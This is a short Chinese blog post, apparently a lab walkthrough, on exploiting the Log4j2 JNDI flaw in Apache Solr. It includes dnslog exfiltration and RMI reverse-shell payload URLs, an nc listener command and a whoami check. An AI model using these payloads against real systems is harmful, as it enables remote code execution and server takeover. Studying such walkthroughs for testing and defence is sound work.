当前位置: 首页 > news >正文

Log4j2漏洞实战

news 来源:原创 2025/5/18 1:34:32

1,打开环境后访问该ip

2,打开dnslog.cn,获取一个域名,我们这里是2bfvl6.dnslog.cn

3,访问http://47.122.51.245:8983/solr/admin/coresaction=${jndi:ldap://${sys:java.version}.2bfvl6.dnslog.cn}

4,返回dnslog.cn查看是否有回显

5,反弹Shell

6,再打开一个宝塔进行监听

nc -lvvp 5555

7,访问http://47.122.51.245:8983/solr/admin/coresaction=${jndi:rmi://45.122.51.245:1099/5ltonm}可以看到⽹⻚被重定向到了我们的恶意类⽹址,回到宝塔查看

8,通过whoami来获得服务器权限

相关文章:

  • 学有所得-Deepin linux操作系统在安装nvidia显卡驱动后的问题修复
  • IT6636: 3-IN 1-OUT HDMI 2.1 (48 Gbps) Retiming Switch with Embedded MCU
  • mybatis_plus的乐观锁
  • C++《红黑树》
  • Python第五章05:银行ATM机程序
  • 蓝桥杯备考:DFS求最短路之字串变换
  • TCP协议的多线程应用、多线程下的网络编程
  • 数字孪生的建模师blender和maya你更喜欢用哪个?
  • 【图像处理基石】什么是动态范围?
  • 数据结构入门(1)——算法复杂度
  • 【Linux】Bash是什么?怎么使用?
  • 【力扣刷题实战】最大连续1的个数 III
  • QQ村旅游网站的设计基于SSM项目的【QQ村旅游网站的设计】
  • 若依分离版整合多数据源——Phoenix+HBase
  • 【初始C语言】转义字符
  • 图数据库Neo4j和JDK安装与配置教程(超详细)
  • 【C#高级编程】—表达式树详解
  • 深入理解Linux文件系统:从磁盘结构到inode与挂载
  • 【GPT入门】第25课 掌握 LangChain:链式调用的奥秘、特性与使用示例
  • javaEE————文件IO(1)
  • 经济日报:人工智能开启太空经济新格局
  • 哪条线路客流最大?哪个站点早高峰人最多?上海地铁一季度客流报告出炉
  • 官方通报汕头违建豪宅“英之园”将强拆:对有关人员严肃追责问责
  • 竞彩湃|欧联杯决赛前,曼联、热刺继续划水?
  • 全国省市县国土空间总体规划已基本批复完成,进入全面实施阶段
  • 贵州省委军民融合发展委员会办公室副主任李刚接受审查调查